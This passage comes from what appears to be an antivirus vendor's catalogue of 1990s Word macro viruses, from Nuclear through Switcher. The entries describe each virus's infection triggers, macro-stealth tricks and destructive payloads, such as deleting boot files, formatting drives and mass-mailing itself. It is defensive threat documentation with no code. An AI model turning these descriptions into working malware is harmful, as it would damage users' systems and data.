(after Concept). It was distributed, over the Internet in a document with information about the Concept virus. It was also the first macro virus that uses Execute-Only (encrypted) macros to make analysis more difficult. Nuclear is activated with the "AutoExec" and "AutoOpen" macros. Before it infects the global template (normal.dot), it checks for a previous infection. It does not infect if it finds the "AutoExec" macro. Documents become infected when they are saved with the "FileSaveAs" command. After the virus macros have been transferred to the global template, Nuclear calls some destructive payloads. The first payload tries to drop the "Ph33r" virus. Between 17:00 and 17:59, Nuclear creates a text file including a script of the DOS/Windows-EXE virus "Ph33r". It then uses the DOS command "DEBUG.EXE" to convert the file into an executable file. It also creates the "EXEC_PH.BAT" batch file, and calls it via a Dos shell. This last infection routine is faulty, the DOS-window is closed immediately, and the "Ph33r" virus never infects the system. The second payload, upon printing a document, Nuclear checks the system time and in case of a value larger than 55 in the seconds field, it adds the following text at the end of the printed document: " And finally I would like to say: " " STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC " The third destructive payload is activated on April 5, when Nuclear deletes the system files "C:\IO.SYS", "C:\MSDOS.SYS" and "C:\COMMAND.COM. This leaves the computer unbootable. [WORD_Nuclear.B] Virus name: WORD_Nuclear.B Virus Type: Word macro virus Number of macros: 7 Encrypted: Yes Macro names: AutoExec, AutoOpen, FilePrint, FilePrintDefault, FileSaveAs, InsertPayload, Payload Size of macros: 3458 Bytes Place of origin: France Date of origin: March 1996 Destructive: Yes Common In-The-Wild: Yes Description: The difference between this new variant and the Nuclear.A virus is that Nuclear.B does not try to drop the "PH33r" virus. For more information, please refer to the Nuclear.A description. [WORD_Outlaw.A] Virus name: WORD_Outlaw.A Virus Type: Word macro virus Number of macros: 3 Encrypted: No Macro names: randomly selected Size of macros: 21410 Bytes Place of origin: Germany Date of origin: September 1996 Payload: Yes Common In-The-Wild: No Description: Outlaw has 3 unencrypted macros with a size of 21410 Bytes. Each macro name consists of 5 characters made of: 2 letters (A-X) corresponding to the hour field of the time and 4 randomly selected numbers. Outlaw redefines built-in macro commands. One macro is associated with the letter " E " and another macro with the "spacebar." Since both keys are very common, the probability of an infection is very high. Outlaw is considered the first (semi) polymorphic virus, since it changes its macro names. Outlaw modifies the "Int1" section of Win.ini (Windows directory). It puts the three random macro names under Name=, Name1= and Name2=. This modification is used for recognition of an already infected global template. Outlaw does not infect the global template if the macro names, mentioned in Win.ini (Name=xxxxxx), already exist. It also modifies the following 3 document variables: VirName VirNameDoc VirNamePayload Outlaw.A does not infect a document if the value of the VirNameDoc variable already exists in a document. Upon infection of a document on January 20, Outlaw launches its payload (works only under Windows 95). It plays a laughing sound on the PC speaker and creates a new document with the following text: " You are infected with " " Outlaw " " A virus from Nightmare Joker. " [WORD_Outlaw.B] Virus name: WORD_Outlaw.B Virus Type: Word macro virus Number of macros: 3 Encrypted: Yes Macro names: randomly selected Size of macros: 21434 Bytes Place of origin: Germany Date of origin: September 1996 Payload: Yes Common In-The-Wild: No Description: The difference between this new variant and the original Outlaw.A virus is that Outlaw.B has three encrypted macros while the macros in Outlaw.A are unencrypted. For more information, please refer to the Outlaw.A description. [WORD_Outlaw.C (a.k.a MoonRaider)] Virus name: WORD_Outlaw.C (a.k.a MoonRaider) Virus Type: Word macro virus Number of macros: 5 Encrypted: Yes Macro names: Random names Size of macros: 14806 Bytes Place of origin: Germany Date of origin: November 1996 Payload: Yes Seen In-The-Wild: No Description: Outlaw.C is a combination of the Outlaw.A and Magnum viruses. It uses assigned keys to start up its macros. One of the macros is associated with pressing SPACE, the other with pressing "e." ToolsMacro and ExtrasMakro are the two fixed virus macros. Outlaw.C replaces "Tools/Macro" and "Extras/Makro" with its own code in order to make recognition of an infected file more difficult (called macro stealth technique). The remaining 3 macro names are randomly chosen. Each name consists of characters: the first 2 letters correspond to the hour field of the infection time and the next 4 characters are randomly selected numbers. Outlaw.C stores its macro names in the document variables: VirName, VirNameDoc, and VirNamePayLoad. For the global template it uses the [intl] section of win.ini to store it macro names: Name1=, Name2=, and Name3=. Upon pressing the "E" key on October 10th of each year a document with the following text is created: " You are infected with the MooNRaiDer Virus! " " Greetings to all members of Vlad! " " I hope that's not the end! " " The scene would be to boring without this very good group! " " Nightmare Joker " On any other day of the year, Outlaw.C checks the "Goodbye" setting in the "Vlad" section of win.ini. If it is not "Yes" then a DOS based virus (written by the Australian virus writing group VLAD) is dropped and an extra line is added to C:\AUTOEXEC.BAT to execute the virus. The hidden filename of the DOS-based virus is "goodbye.com." [WORD_Oval.A] Virus name: WORD_Oval.A Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 339 Bytes Place of origin: Texas, USA Date of origin: April 1997 Payload: Yes Seen In-The-Wild: Yes Description: Oval.A infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). When Oval triggers, it changes the font size (probability of 10 percent) of the active document. It also shows the following message in the status bar: " Be sure to drink your Ovaltine " [WORD_Paper.A] Virus name: WORD_Paper.A Virus Type: Word macro virus Number of macros: 5 Encrypted: No Macro names: mswFS, FileClose, AutoOpen, ToolsMacro, AutoExec, FieSave, mswFC, mswAO Size of macros: 3608 Bytes Place of origin: Unknown Date of origin: Unknown Destructive: No Seen In-The-Wild: No Description: When Paper infects a document, or the global template, it copies all its virus macros and then renames them. If the "AutoOpen" and "FileClose" macros already exist in the global template, they are deleted. In a similar fashion, the "FileSave" macro is deleted from documents. Paper replaces the Tools/Macro option with a dummy macro in order to make recognition of an infected file more difficult (called macro stealth technique). If a user selects the Tools/Macro option nothing happens. [WORD_PayCheck.A] Virus name: WORD_PayCheck.A Virus Type: Word macro virus Number of macros: 7 Encrypted: Yes Macro names: AutoExec, AutoOpen, FileOpen, FileSave FileSaveAs, ShellOpen, ToolsMacro Size of macros: 8489 Bytes Place of origin: Unknown Date of origin: Spring 1997 Payload: Yes Common In-The-Wild: Yes Description: Paycheck infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are saved. It uses "ToolsMacro" to make recognition of an infected document more difficult (called macro stealth technique). It also checks the system time and in case of a 25, 26, 27, 28, 29, 30 or 31 in the day field, it displays the following message: " Sekarang adalah tanghal 25, sudahkah anda mengabil gaji? " " He..he..selamat. Kalau bisa, lebih keras lagi kerjany a. " " Bravo Bukit Asam!!! " When a user saves a document between the 20th and the 31st of each month, Paycheck displays another message: " Internal error was occurred in module UNIDRV.DLL. " " Your application may not be work normally. " " Please contact Microsoft Product Support. " [WORD_Phantom.A (a.k.a Teaside, Guess, HiSexy)] Virus name: WORD_Phantom.A (a.k.a Teaside, Guess, HiSexy) Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 1126 Bytes Place of origin: Germany Date of origin: May 1996 Destructive: Yes Common In-The-Wild: No Description: When an infected document is opened, Guess checks if the document variables are set to "populated." If this is not the case, a new global template (normal.dot) is created and the virus macro "AutoOpen" is copied into the new document. After that the variables are set to "populated" in order to mark the file as "infected." If the variables are already set, the virus infects the new document by transferring the "AutoOpen" macro using the MakroCopy command. Guess is the first macro virus to use the document variables as a checking mechanism for already infected documents. Because of an error inside the virus code, the virus does not replicate properly. Upon a random number (between 0 and 100), Guess activates various destructive payloads. It changes the active font size or creates a new document including the following text: " The word is out. " " The word is spreading... " " The Phantom speaks... " " Sedbergh " " is CRAP " " The word spreads... " The text will then be printed out. The following texts will be inserted into the active document upon a calculated random number: " This school is really good. NOT " " We all love Mr. Hirst. " " M.R.Beard " " This network is REALLY fast. " " Hi Sexy! " " Who's been typing on my computer? " " Well helloooo there! " " Guess who? " [WORD_Phardera.A (a.k.a. Phandera)] Virus name: WORD_Phardera.A (a.k.a. Phandera) Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: FileOpen Size of macros: 1673 Bytes Place of origin: Batavia, Indonesia Date of origin: July 1996 Destructive: Yes Common In-The-Wild: No Description: Phardera activates when an infected document is opened (FileOpen). Phardera will not infect the global template or documents if one of the following macros is already present: "FileOpen" "ToolsCustomizeMenus" "ToolsOptionsSave" "ToolsOptionsGeneral" Phardera tries to hide its presence by removing Tools/Macro, Tools/Customize and File/Templates from the options menu (called macro stealth technique). This part of the virus works only with the English version of Microsoft Word. Upon infection of a document on the 13th of each month, Phardera displays the following message: " Dianita DSR. [I Love Her!] " A second message is displayed when a document is infected on the 31st of each month. " Phardera was here! " [WORD_Polite.A(a.k.a. WW2Demo)] Virus name: WORD_Polite.A (a.k.a. WW2Demo) Virus Type: Word macro virus Number of macros: 2 Encrypted: No Macro names: FileClose, FileSaveAs Size of macros: 1918 Bytes Place of origin: USA Date of origin: March 1996 Destructive: No Common In-The-Wild: No Description: Polite was first created with Microsoft version 2.0, yet it also works with higher versions of Microsoft Word. Polite can be called a demonstration virus and is very unlikely to spread. Before each infection attempt, it displays a window with the following question: " Shall I infect the file ? " If the user answers with the "No" button, no document gets infected. While it asks for permission to infect files, it does not ask for permission to infect the global template (NORMAL.DOT). Upon infection of the global template (when an infected document is closed), Polite displays the following message: " I am alive! " Once Polite infects a Word 6.0/7.0 document it can not infect Word 2.0 documents anymore. [WORD_Random.A (Intended)] Virus Type: Word macro virus Virus name: WORD_Random.A (Intended) Number of macros: 1 or more Encrypted: No Macro names: randomly chosen Size of macros: 553 Bytes Place of origin: Unknown Date of origin: Spring 1997 Payload: No Seen In-The-Wild: No Description: Random.A is another macro virus that does not infect any other documents. Therefore, it is highly unlikely that users will run into a document infected with this virus. [WORD_Randomic.A] Virus name: WORD_Randomic.A Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: polymorphic Size of macros: 2397 Bytes Place of origin: Germany Date of origin: Spring 1997 Payload: Yes Seen In-The-Wild: No Description: Randomic infects the global template (normal.dot) when an infected document is opened. Further documents become infected when the user presses a randomly chosen key (which is linked to the viral macro). The two document variables that keep the name of the macro and the key shortcuts are: " RANDOMIC " " TKEY " Randomic also displays a message on April 4th and tries to exit Windows. [WORD_Rapi.A] Virus name: WORD_Rapi.A Virus Type: Word macro virus Alias: WORD_Bacalah Number of Variants: 46 Number of macros: 7 or 11 (global template) Encrypted: No Macro names: RpAe, RpFO, RpFS, RpTC, RpTM, RpFSA, AutoOpen Size of macros: 6172 Bytes or 11228 Bytes Place of origin: Indonesia Date of origin: December 1996 Destructive: No Common In-The-Wild: Yes Description: Rapi infects the global template when an infected document is opened (AutoOpen). Further documents become infected when they are opened (FileOpen) or saved (FileSave and FileSaveAs). Upon infection, Rapi displays the following message: " Thank's for joining us ! " The "AutoExec" macro contains a destructive payload to delete files, yet due to some REM's it never triggers. However, Rapi.A drops a file (C:\BACALAH.TXT) to the root directory. The file contains the following Indonesian text: (translated into English) " Assalamualaikum..., sorry @Rapi.Kom disturbs you. This message " " was originally called PESAN.TXT. It appears in the root directory " " after running Word 6.0 and the global template (normal.dot) is " " already infected by this macro. This macro virus (before the change " " by Rapi@Kom) cam from a Word 6.0 file (*.doc) which was already " " infected by this virus. When the file is opened (Open doc), the " " macro automatically executes the instructions i.e. " " copies itself to the global template (normal.dot). On a certain " " date and time the macro will delete all files in the directory " " levels 1, 2, and 3 (except for hidden directories........ " " Malang (date and time of infection) @Rapi.Kom " Rapi uses "ToolsMacro" and "ToolsCustomize" to make recognition of an infected file more difficult (called macro stealth technique). If a user selects one of the two options, Word displays a WordBasic error message. Rapi.A devolves into Rapi.A1 and Rapi.A2, which contain 6 or 3 macros (5607 Bytes or 3626 Bytes). [WORD_Bacalah] Virus name: WORD_Bacalah Virus Type: Word macro virus Alias: WORD_Rapi.A Number of Variants: 46 Number of macros: 7 or 11 (global template) Encrypted: No Macro names: RpAe, RpFO, RpFS, RpTC, RpTM, RpFSA, AutoOpen Size of macros: 6172 Bytes or 11228 Bytes Place of origin: Indonesia Date of origin: December 1996 Destructive: No Common In-The-Wild: Yes Description: Bacalah infects the global template when an infected document is opened (AutoOpen). Further documents become infected when they are opened (FileOpen) or saved (FileSave and FileSaveAs). Upon infection, Bacalah displays the following message: " Thank's for joining us ! " The "AutoExec" macro contains a destructive payload to delete files, yet due to some REM's it never triggers. However, Bacalah drops a file (C:\BACALAH.TXT) to the root directory. The file contains the following Indonesian text: (translated into English) " Assalamualaikum..., sorry @Rapi.Kom disturbs you. This message " " was originally called PESAN.TXT. It appears in the root directory " " after running Word 6.0 and the global template (normal.dot) is " " already infected by this macro. This macro virus (before the change " " by Rapi@Kom) cam from a Word 6.0 file (*.doc) which was already " " infected by this virus. When the file is opened (Open doc), the " " macro automatically executes the instructions i.e. " " copies itself to the global template (normal.dot). On a certain " " date and time the macro will delete all files in the directory " " levels 1, 2, and 3 (except for hidden directories........ " " Malang (date and time of infection) @Rapi.Kom " Bacalah uses "ToolsMacro" and "ToolsCustomize" to make recognition of an infected file more difficult (called macro stealth technique). If a user selects one of the two options, Word displays a WordBasic error message. [WORD_Rapi.AA2] Virus name: WORD_Rapi.AA2 Virus Type: Word macro virus Number of macros: 3 or 5 (global template) Encrypted: No Macro names: RpAe, RpFS, AutoOpen Size of macros: 4626 Bytes or 8571 Bytes (global template) Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Common In-The-Wild: Yes Description: Rapi.AA2 infects the global template when an infected document is opened (AutoOpen). Further documents become infected when they are saved (FileSave). Rapi.AA was discovered in its last devolved form, thus it was named Rapi.AA2. The main difference between this virus and the previous Rapi viruses is that the "RpAe" macro is corrupted. Microsoft Word does not care about corrupted macros, therefore Rapi.AA2 is still able to infect further documents. [WORD_Reflex.A (a.k.a RedDwarf)] Virus name: WORD_Reflex.A (a.k.a RedDwarf) Virus Type: Word macro virus Number of macros: 3 or 4 Encrypted: Yes Macro names: AutoOpen, FClose, FileClose, FA Size of macros: 897 Bytes in .doc files 1226 Bytes in global template Place of origin: Ireland Date of origin: Summer 1996 Destructive: No Common In-The-Wild: No Description: An infected global template contains one more macro ("FA"). Upon infection, Reflex turns off the prompting of Word to ensure a hidden infection of the global template (normal.dot). Infected documents are saved with the password "Guardian." Reflex was written at an anti-virus conference after an anti-virus company announced a challenge to hackers to break its new technology. Any author of a new undetected macro virus was supposed to receive champagne as a reward. When Reflex infects a file it displays the following window: " Now, Where's that Jerbil of Bubbly? " [WORD_Sam.A:Tw] Virus name: WORD_Sam.A:Tw Virus Type: Word macro virus Number of macros: 7 or 4 Encrypted: Yes Macro names: AutoOpen, Autoexec, AutoNew, FileSaveAs (ToolsMacro, FileTemplates, Monday) Size of macros: 4192 or 6082 Bytes Place of origin: Taiwan Date of origin: Spring 1997 Destructive: Yes Seen In-The-Wild: No Description: Sam.A is another macro virus that only works with the East Asian version of Microsoft Word. Sam infects the global template when an infected document is opened. Further documents become infected when they are also opened, created, or saved (FileSaveAs). Sam has various destructive payloads: 1. Every Monday at 10:00, Sam overwrites the AUTOEXEC.BAT file with commands that will format the hard disk upon the next boot-up. It also displays the following messages: " Taiwan Dark Monday Today is Monday, do you work hard? " " It's tea time now! Let's go out and have some fun... " 2. On every Monday the 13th, Sam deletes all .INI file in the C:\WINDOWS directory and then displays the following message: " It Is Dark Monday... " 3. When FileTemplates is accessed, Sam shows the message " Taiwan Dark Monday Go ahead! Make my day!!! " and then replaces all text with the following: " TAIWAN DARK MONDAY " 4. When ToolsMacro is accessed, Sam shows the message " Taiwan Dark Monday You may insert password to access here..." and encrypts the active document with the following password: " Samuel " The document that was distributed over the Internet differs in one of the macros (ToolsMacr instead of ToolsMacro). Due to this macro name change, Sam.A devolves into Sam.A1 (with only 4 macros instead of 7). Infected samples with only 4 macros are not capable of further infecting documents. They are classified as "intended." [WORD_Satanic.A] Virus name: WORD_Satanic.A Virus Type: Word macro virus Number of macros: 5 Encrypted: Yes Macro names: AutoOpen, AutoClose, AutoExec, AutoExit, AutoNew Size of macros: 53249 Bytes Place of origin: Germany Date of origin: Summer 1996 Destructive: Yes Common In-The-Wild: No Description: Satanic activates when an infected document is opened (AutoOpen). Satanic does not infect when the "AutoExit" macro already exists in the global template or a document. Further documents become infected when they are created (AutoNew), closed (AutoClose) or Microsoft Word is exited (AutoExit). Satanic deletes the Tool/Customize, Tool/Macro and Tools/Option menu items to make recognition of an infected document more difficult (called macro stealth technique). Satanic also inserts "Installed=Yes" into the "Control" section of win.ini. If it does not find the entry (first activation or deletion) then it tries to drop and launch a DOS-based virus (NC.COM). Upon exiting Microsoft Word (AutoExit) on October 1st, Satanic will format the C drive unconditionally, resulting to a loss of valuable information. A second payload will activate on September 30th. Satanic will then display the following message: " You are infected with Satanic " [WORD_Saver.A (a.k.a. SaverSex)] Virus name: WORD_Saver.A (a.k.a. SaverSex) Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: DateiSpeichern Size of macros: 602 Bytes Place of origin: Austria Date of origin: September 1996 Destructive: No Common In-The-Wild: No Description: Saver activates when an infected document is saved (DateiSpeichern). It does not infect when the "DateiSpeichern" macro already exists in the global template. The same is true for documents. Upon activation of the virus on April 21st the following message will be displayed: " Saver(SEX) written by Spooky. Austria 1996 " [WORD_ShareFun.A] Virus name: WORD_ShareFun.A Virus Type: Word macro virus Number of macros: 9 Encrypted: No Macro names: AutoExec, AutoOpen, FileExit, FileOpen, FileSave FileClose, ToolsMacro, FileTemplates, ShareTheFun Size of macros: 1777 Place of origin: USA Date of origin: 1997 Payload: Yes Common In-The-Wild: Yes Description: ShareFun infects the global template when an infected document is opened (AutoOpen). Further documents become infected when they are opened (FileOpen), saved (FileSave), closed (FileClose) or on activation of FileExit, ToolsMacro and FileTemplates. When an infected document is opened, the "ShareTheFun" macro is called (probability of 25 percent) and the document is saved to the root directory with the following name: "Doc1.doc" After that ShareFun looks for an active copy of MSMail. There are two different outcomes: 1. MSMail is inactive Result: Sharefun shuts down Windows. 2. MSMail is active Result: Sharefun tries to take control of MSMail and sends 3 e-mail messages to 3 randomly picked names from the address book. Attached to the e-mail message, with the header "You have GOT to read this!", is the infected document. By doing this ShareFun tries to spread itself to new users. The above payload does not always work. ShareFun also uses "ToolsMacro" and "FileTemplates" to make recognition of an infected document more difficult (called macro stealth technique). Even though ShareFun was hyped by the marketing department of one anti-virus company, it is very unlikely that you will become infected with this virus. It remains to be a research virus. [WORD_ShareFun] Virus name: WORD_ShareFun Virus Type: Word macro virus Number of macros: 9 Encrypted: No Macro names: Size of macros: Place of origin: Date of origin: February 1997 Destructive: No Common In-The-Wild: No Description: This virus has 9 macros, all of which are encrypted. This virus uses the "ToolsMacro" to make recognition of an infected document more difficult (called macro stealth technique). The macros are: "AutoExec" "AutoOpen" "FileExit" "FileOpen" "FileSave" "FileClose" "ToolsMacro" "ShareTheFun" "FileTemplates" The AutoExec macro sets the DisableAutomacros, while AutoOpen randomly selects, with 25% probability, to hook ShareTheFun. The Saveall submacro copies the above macros to the global template (NORMAL.DOT) and to the new/open document file. (Detected by MacroTrap's rule1.) The following describes the functions of the other macros: 1) FileExit: hooks AutoOpen's Saveall submacro 2) FileOpen: hooks AutoOpen's Saveall submacro 3) FileSave: hooks AutoOpen's Saveall submacro 4) FileClose : hooks AutoOpen's Saveall submacro 5) ToolsMacro: disables ToolsMacro and hooks AutoOpen's Saveall submacro 6) ShareTheFun : checks whether or not the MSMail is active. If it is, the virus hooks MSMail then sends 3 e-mail messages to 3 randomly picked names from the address book. Attached to the e-mail message, with the header "You have GOT to read this!", is the infected document. 7) FileTemplates: hooks AutoOpen's Saveall submacro [WORD_Showoff.A (Showofxx)] Virus name: WORD_Showoff.A (Showofxx) Virus Type: Word macro virus Number of macros: 3 Encrypted: Yes Macro names: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec Size of macros: 6789 Bytes Place of origin: Unknown Date of origin: Unknown Payload: No Seen In-The-Wild: No Description: Showoff infects the global template (normal.dot) when an infected file is opened. Further documents become infected when they are closed. Showoff.A is most likely a corrupted "mutation" of another variant. The "Show" macro ("AutoExec" macro after infecting the global template) contains invalid Wordbasic instructions. Due to those instructions, Showoff displays the following error message when Word is started: " Out of Memory " Microsoft Word is not affected with garbage codes, thus the virus is able to infect other documents. [WORD_Showoff.B (Showofxx)] Virus name: WORD_Showoff.B (Showofxx) Virus Type: Word macro virus Number of macros: 3 Encrypted: Yes Macro names: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec Size of macros: 7955 Bytes Place of origin: Unknown Date of origin: January 1997 Payload: No Seen In-The-Wild: No Description: Showoff.B infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed. The "Show" macro ("AutoExec" macro after infecting the global template) contains invalid Wordbasic (corrupted) instructions. Due to those instructions, Showoff displays an error message. Microsoft Word is not affected with corrupted macros, thus the virus is able to infect other documents. [WORD_Showoff.C (Showofxx)] Virus name: WORD_Showoff.C (Showofxx) Virus Type: Word macro virus Number of macros: 3 Encrypted: Yes Macro names: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec Size of macros: 4758 Bytes Place of origin: Australia Date of origin: January 1997 Payload: No Seen In-The-Wild: Yes Description: ShowOff.C is the original virus for the ShowOff virus family. Most likely, other corrupted variants (such as ShowOff.A and B) are based on its code. ShowOff.C infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed. Unlike other macro viruses, ShowOff.C does not contain any destructive payloads. It only displays some messages. [WORD_ShowOff.D] Virus name: WORD_ShowOff.D Virus Type: Word macro virus Number of macros: 3 Encrypted: Yes Macro names: AutoOpen, Show, Cfxx Size of macros: 6789 Bytes Place of origin: Unknown Date of origin: February 1997 Destructive: No Common In-The-Wild: No Description: The difference between this new variant and the original ShowOff virus is that the "Show" (AutoExec in the global template) macro is corrupted. Due to this corruption, Microsoft Word displays the following error message when Word is started: " Out of memory " Even with this error, ShowOff.D is still able to spread and infect other documents. For more information, please refer to the ShowOff.A virus description. [WORD_Showoff.E (Showofxx)] Virus name: WORD_Showoff.E (Showofxx) Virus Type: Word macro virus Number of macros: 3 Encrypted: Yes Macro names: AutoOpen, Show, Cfxx, Ofxx, AutoClose, AutoExec Size of macros: 7955 Bytes Place of origin: Europe Date of origin: January 1997 Payload: Yes Seen In-The-Wild: No Description: Showoff.E infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed. Showoff.E combines with the Bandung virus, using its destructive "AutoExec" macro. The "Show" macro ("AutoExec" macro after infecting the global template) contains the destructive code, which is activated when Microsoft Word is started. For more information, please refer to the Bandung.A virus description. [WORD_Showoff.F (Showofxx)] Virus name: WORD_Showoff.F (Showofxx) Virus Type: Word macro virus Number of macros: 3 Encrypted: Yes Macro names: AutoOpen, Show, Cfxx, (Ofxx, AutoClose, AutoExec) Size of macros: 4758 Bytes Place of origin: Unknown Date of origin: Spring 1997 Payload: No Seen In-The-Wild: No Description: ShowOff.F infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed. The main difference between this new variant and previous ShowOff viruses is that ShowOff.F does not display the following message: " TO ONE OF US, PEACE ! HAPPY BIRTHDAY!!! " [WORD_Simple.A (Intended)] Virus name: WORD_Simple.A (Intended) Virus Type: Word macro virus Number of macros: 2 Encrypted: Yes Macro names: AutoOpen, Simple Size of macros: 272 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Seen In-The-Wild: No Description: Simple.A is another macro virus that does not work properly. It is not infectious, therefore it is very unlikely that users will run into documents infected with this virus. [WORD_Simple.B ] Virus name: WORD_Simple.B Virus Type: Word macro virus Number of macros: 2 Encrypted: Yes Macro names: AutoOpen, Simple Size of macros: 264 Bytes Place of origin: Unknown Date of origin: April 1997 Destructive: No Seen In-The-Wild: No Description: Simple.B infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). The main difference between this new variant and the older Simple.A virus is that Simple.B is infectious and also displays the following message: " The Concept is Simple! " [WORD_Smiley.A] Virus name: WORD_Smiley.A Virus Type: Word macro virus Number of macros: 8 Encrypted: Yes Macro names: AutoExec, AutoExit, AutoOpen, DateiSpeichern, DateiSpeichernUnter, DateiDrucken, Timer DateiDruckenStandard Size of macros: 6435 Bytes Place of origin: Germany Date of origin: Unknown Destructive: Yes Seen In-The-Wild: No Description: Smiley is another macro virus written for the German version of Microsoft Word. Smiley infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are saved with the DateiSpeichern and DateiSpeichernUnter commands. To make recognition of an infected document more difficult, Smiley removes the Extras/Makro and Datei/Dokumentvorlage option (called macro stealth technique). When Word is started (AutoExec), Smiley puts the string "Smiley=xx" into the [windows] section of win.ini (inside the Windows directory). "xx" represents a number. 14 days after the first infection, Smiley changes the Tools/Options/Userinfo to the following: " Name: Smiley Corporation " " Initials: SC " " Address: Greenpeace " Furthermore, Smiley removes the following menu items: Datei/Makro Datei/Dokumentvorlage Ansicht/Symbolleisten Extras/Anpassen 56 days after the first infection, Smiley creates a new C:\AUTOEXEC.BAT file and formats the hard drive upon the next boot-up. Upon Exiting Word (AutoExit), Smiley displays various messages and adds them at the end of a printed document. [WORD_Snickers.A ] Virus name: WORD_Snickers.A Virus Type: Word macro virus Number of macros: 2 Encrypted: No Macro names: AutoOpen, AutoClose Size of macros: 420 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: Yes Seen In-The-Wild: No Description: Snickers.A does not infect the global template (normal.dot) unlike many other macro viruses. It uses a new type of infection (called direct action). It infects documents during the following processes: 1. An uninfected document is opened. It becomes listed in the MRU (Most recently used) list. 2. An infected document is opened. The virus tries to infect all the files listed in the MRU list. Snickers has another annoying payload (AutoClose). During infection, it encrypts the text by swapping adjacent characters. The text is decrypted when an infected document is opened (AutoOpen). Virus scanners that only remove the macros will have the document text encrypted. [WORD_Spooky.A] Virus name: WORD_Spooky.A Virus Type: Word macro virus Number of macros: 9 Encrypted: Yes Macro names: autoexec, AutoOpen, dateidokvorlagen, dateidrucken, dateidruckenstandard, extrasmakro, DateiSpeichernUnter, DateiOeffnen, Spooky Size of macros: 3114 Bytes Place of origin: Austria Date of origin: September 1996 Payload: Yes Common In-The-Wild: No Description: Spooky activates when an infected document is opened (AutoOpen). Further documents become infected when they are opened (DateiOeffnen) or saved (DateiSpeichernUnter). Spooky does not infect when the "Spooky" macro already exists in the global template (normal.dot) or a document. Spooky disables the File/Templates and Tools/Macro menu items in order to make recognition of an infected file more difficult (called macro stealth technique). If a user tries to select one of the two options he/she is prompted for a password. Upon entering "ykoops" at the prompt in the status bar, the original menus reappear. Entering an incorrect password displays the following message: " Sie haben das falsche Passwort eingegeben " translated: " You have entered the wrong password " Spooky randomly displays the following message in the status bar: " Word.Spooky " When a user prints out a document with the system time between 55 and 59, Spooky inserts the following text at the end of the printout: " WORD_Spooky " [WORD_Stryx.A ] Virus name: WORD_Stryx.A Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: DateiSchliessen, DokumentSchliessen, Stryx1, Stryx2, StryxOne, StryxTwo Size of macros: 25669 Bytes Place of origin: Germany Date of origin: September 1996 Payload: Yes Common In-The-Wild: No Description: While Stryx has 4 macros, some of them are only available in the global template or in documents. "Stryx1" (only in the global template) "Stryx2" (only in the global template) "StryxOne" (only in documents) "StryxTwo" (only in documents) Activation of Stryx occurs when a document is closed (DateiSchliessen and DokumentSchliessen). Stryx then modifies the "Int1" section of win.ini (Windows directory). It sets a YES to the value of the installed init string and creates a .GIF picture of a dragon (based on a hex dump). Upon closing a document on December 1st, a new document is created and the picture of the dragon is inserted. Followed by the dragon is: " STRYX!!!! " " Look at your HD! :-) " " Sorry, but it's so funny! " " NJ 1996 " Stryx does not infect when the "Stryx2" macro already exists in the global template or when the "StryxTwo" macro already exists in a document. [WORD_Surabaya.A] Virus name: WORD_Surabaya.A Virus Type: Word macro virus Alias: WORD_Ice.Man Number of macros: 6 Encrypted: No Macro names: AutoExec, AutoOpen, Plong, FileSaveAs ToolsMacro, FileTemplates Size of macros: 1832 Bytes Place of origin: Unknown Date of origin: Spring 1997 Payload: Yes Seen In-The-Wild: Yes Description: Surabaya infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are saved (FileSaveAs). Surabaya uses ToolsMacro and FileTemplates to make recognition of an infected document more difficult (called macro stealth technique). We advise not to access the two menu items, since they often execute the viral code. In case of Surabaya, they display a message with " Sorry... " in it. Whenever Microsoft Word is started from an infected global template, the following message is displayed in the status bar: " Lontong Micro Device ( c ) 1993 By ICE-Man " Surabaya also adds the following text to the "Author" section of C:\WINDOWS\WIN.INI: " Name=TebeYe'93 The ICE-Man " [WORD_Ice.Man] Virus name: WORD_Ice.Man Virus Type: Word macro virus Alias: WORD_Surabaya.A Number of macros: 6 Encrypted: No Macro names: AutoExec, AutoOpen, Plong, FileSaveAs ToolsMacro, FileTemplates Size of macros: 1832 Bytes Place of origin: Unknown Date of origin: Spring 1997 Payload: Yes Seen In-The-Wild: Yes Description: Ice.Man infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are saved (FileSaveAs). Ice.Man uses ToolsMacro and FileTemplates to make recognition of an infected document more difficult (called macro stealth technique). We advise not to access the two menu items, since they often execute the viral code. In case of Ice.Man, they display a message with " Sorry... " in it. Whenever Microsoft Word is started from an infected global template, the following message is displayed in the status bar: " Lontong Micro Device ( c ) 1993 By ICE-Man " Ice.Man also adds the following text to the "Author" section of C:\WINDOWS\WIN.INI: " Name=TebeYe'93 The ICE-Man " [WORD_Switcher.a] Virus name: WORD_Switcher.a Virus Type: Word macro virus Number of macros: 10 Encrypted: Yes Macro names: AutoExec, AutoOpen, Autoclose, FileOpen, FileSave FileSaveAs, FileClose, FilePrint, FileTemplates, Toolsmacro Size of macros: 2328 Bytes Place of origin: Unknown Date of origin: April 1997 Destructive: Yes Seen In-The-Wild: Yes Description: Switcher activates when an infected document is opened. It uses "ToolsMacro" and "FileTemplates" to make recognition of an infected document more difficult (called macro stealth technique). When a user selects one of the two menu items, it displays the following message: " Configuration conflict - menu item is not available. " Switcher has various destructive payloads. When Microsoft Word is started (AutoExec), Switcher triggers (probability of 1/60) and tries to delete one of the following: 